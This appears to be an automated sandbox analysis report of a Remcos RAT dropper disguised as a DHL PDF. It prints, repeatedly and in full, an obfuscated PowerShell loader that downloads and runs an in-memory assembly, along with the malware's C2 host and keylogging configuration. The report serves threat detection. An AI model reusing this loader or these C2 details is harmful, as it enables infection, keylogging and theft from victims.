'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6968, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js", ProcessId: 1772, ProcessName: cmd.exe
          Sigma detected: Usage Of Web Request Commands And Cmdlets
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessa
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js", CommandLine|base64offset|contains: D, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js", ProcessId: 1492, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessa

          Data Obfuscation

          barindex
          Sigma detected: Powershell download and load assembly
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessa

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-19T16:11:51.646997+010020204231Exploit Kit Activity Detected37.27.124.176443192.168.2.549837TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-19T16:11:51.646997+010020204251Exploit Kit Activity Detected37.27.124.176443192.168.2.549837TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-19T16:11:53.122959+010020365941Malware Command and Control Activity Detected192.168.2.549850109.248.150.1953174TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-19T16:11:52.128950+010020576351A Network Trojan was detected37.27.124.176443192.168.2.549837TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-19T16:11:49.138300+010020490381A Network Trojan was detected193.30.119.105443192.168.2.549802TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-19T16:11:54.457658+010028033043Unknown Traffic192.168.2.549861178.237.33.5080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-19T16:11:52.128950+010028582951A Network Trojan was detected37.27.124.176443192.168.2.549837TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: meme.linkpc.netAvira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["meme.linkpc.net:3174:1"], "Assigned name": "nm", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "sos", "Hide file": "Disable", "Mutex": "gig-G7MMFK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "vlc", "Keylog folder": "ios", "Keylog file max size": "100"}
          Multi AV Scanner detection for submitted file
          Source: DHL RPA GRBP Template.PDF.jsReversingLabs: Detection: 37%
          Source: DHL RPA GRBP Template.PDF.jsVirustotal: Detection: 37%Perma Link
          Yara detected Remcos RAT
          Source: Yara matchFile source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5600, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_004315EC
          Source: powershell.exe, 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_1c6d0686-9
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.5:49762 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 193.30.119.105:443 -> 192.168.2.5:49802 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 37.27.124.176:443 -> 192.168.2.5:49837 version: TLS 1.2
          Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.resourcesuserresourcedatadnlib.dotnetassemblyrefuserdnlib.dotnetresolveexceptiondnlib.dotnet.emitmethodbodyreaderdnlib.dotnet.resourcesresourcewritermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnet.pdbsymbolreadercreatordnlib.peimagesectionheaderdnlib.dotnet.emitlocallistdnlib.dotnet.writermdtablewriterdnlib.dotnetimdtokenproviderdnlib.dotnet.emitmethodbodyreaderbasednlib.dotnetmethodequalitycomparerdnlib.dotnetmdtokendnlib.dotnettypenameparserdnlib.dotnet.writeriheap source: powershell.exe, 00000002.00000002.2512100355.00007FF848950000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2512100355.00007FF848950000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: `1dnlib.dotnet.mdstreamheaderdnlib.dotnet.mdtableinfodnlib.dotnetmarshalblobreaderdnlib.dotnetitypeormethoddefmicrosoft.win32.taskschedulermonthlydowtriggerdnlib.dotnet.pdbpdbwritermicrosoft.win32.taskschedulertasksettingsmicrosoft.win32.taskschedulertaskserviceversiondnlib.dotneticodedtokendnlib.dotnet.mdrawencmaprowdnlib.dotnet.writeriwritererrordnlib.dotnetimanagedentrypointdnlib.dotnetassemblylinkedresourcednlib.dotnetcablobparserexceptiondnlib.dotnetassemblyattributesdnlib.dotnet.writeritokencreatordnlib.dotnetassemblyresolveexceptiondnlib.dotnetclassorvaluetypesigdnlib.dotnetmethodsigdnlib.dotnetcmodoptsigdnlib.dotnetimplmapmicrosoft.win32.taskschedulertasktriggertypemicrosoft.win32.taskschedulertaskrightsmicrosoft.win32.taskschedulermonthsoftheyeardnlib.pedllcharacteristicsdnlib.dotnetparamattributesdnlib.dotnet.mdicolumnreadersystem.security.accesscontrolaccesscontrolextensionmicrosoft.win32.taskschedulertaskprincipalprivilegesmicrosoft.win32.taskscheduleridletriggermicrosoft.win32.taskscheduler.fluentweeklytriggerbuilderdnlib.dotnetimplmapuserdnlib.dotnet.writerdummymodulewriterlistenermicrosoft.win32.taskschedulerquicktriggertype source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: `1microsoft.win32.taskscheduleritaskhandlerstatusdnlib.dotnet.writerchunklistbase`1dnlib.iohomednlib.dotneticustomattributednlib.dotnet.pdb.dssisymunmanagedwriter2dnlib.dotnet.writermaxstackcalculatordnlib.dotnet.pdbpdbdocumentusersmicrosoft.win32.taskscheduler.fluentmonthlytriggerbuilderdnlib.dotnet.writerhotpooldnlib.dotneteventattributesdnlib.dotnet.pdb.dsssymbolreadercreatordnlib.dotnet.writermodulewriterbasemicrosoft.win32.taskschedulerpowershellactionplatformoptiondnlib.dotnet.writerioffsetheap`1dnlib.dotnetclasslayoutuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetinterfacemarshaltypemicrosoft.win32.taskschedulertaskeventlogdnlib.dotnetmarshaltypemicrosoft.win32.taskschedulertaskfolderdnlib.dotnet.resourcesresourcereaderexceptionmicrosoft.win32.taskscheduleractioncollectiondnlib.ioioextensionsdnlib.dotnet.writerchunklist`1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.mddotnetstreamdnlib.dotnetfieldattributesdnlib.dotnetparamdefdnlib.dotnetimemberrefresolverdnlib.dotnet.writerpeheadersdnlib.dotnet.writerwin32resourceschunkmicrosoft.win32.taskschedulernotv1supportedexceptioncronfieldtypednlib.dotnet.writermethodbodychunksdnlib.dotnetcaargumentmicrosoft.win32.taskscheduleritriggeruseriddnlib.dotnetloggereventdnlib.utilsmfunc`3dnlib.dotnetsecurityactiondnlib.dotnet.pdb.dsssymbolwritercreatordnlib.ioibinaryreadermicrosoft.win32.taskschedulersessionstatechangetriggerdnlib.dotnetassemblydefdnlib.dotneticustomattributetypednlib.dotnetmemberrefresolveexceptionmicrosoft.win32.taskschedulertaskcompatibilityentrydnlib.threadingenumerableiteratealldelegate`1dnlib.dotnet.mdridlistdnlib.dotnet.resourcesresourcereadermicrosoft.win32.taskschedulertaskdefinitiondnlib.dotnet.emitcodednlib.dotnetcmodreqdsigdnlib.dotnet.pdbpdbimpltypednlib.utilsilazylist`1dnlib.dotnet.emitflowcontroldnlib.dotnetleafsigdnlib.dotnetcanamedargumentdnlib.peimagefileheaderdnlib.dotnetisignaturereaderhelperdnlib.dotnet.mdheaptypednlib.dotnetvaluearraysigdnlib.dotnettypedefuserd